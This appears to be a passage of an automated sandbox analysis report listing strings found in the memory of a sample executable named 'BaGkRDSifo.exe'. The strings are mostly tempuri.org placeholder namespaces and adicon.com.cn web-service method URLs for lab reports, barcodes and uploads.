Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/GetReportUriT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/HelloWorldT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/QueryReport_PKIT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/QueryReportsCountT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/RefuseDownloadBarCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/T
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/UpLoadReportFromBytesNewT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/UpLoadReportFromBytesT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/UpLoadReportFromBytes_ImageListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/UpLoadReportFromStrT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/UpLoadRequestFormClientT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/UpgradeRequestFormT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/addInspectReqNoXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/addInspectReqT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/getPatResultNoXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/getPatResultT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/retrieveDocumentViewInfoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/rm_RegionTransT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/rm_Region_FeedbackT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/AppBarcodeStateT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/AppInfoDownT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/AppItemDownT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/AppTrackDownT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/AppUpLoadDeleteT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/AppUpLoadXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/AppUpdateInfoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/DeleteGPGFileT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/DetailListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/ExistsByYYtmT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/ExistsReportByYYtmT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/ExistsReportOtherT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/ExistsReportT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetAMHItemListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetAllSampleListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetAllSampleList_MeiNianT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetBLTCTPicByKeyIdT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetBLTCTPicByYYTMT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetBLTCTPicT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetByteReportByYYtmT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetByteReportT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetImageTestT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetInputXmmcListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetJSONReportItemListByAdiconBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetJSONReportItemListByCustomerBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetJSONReportItemListByOtherCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportBaseInfoT
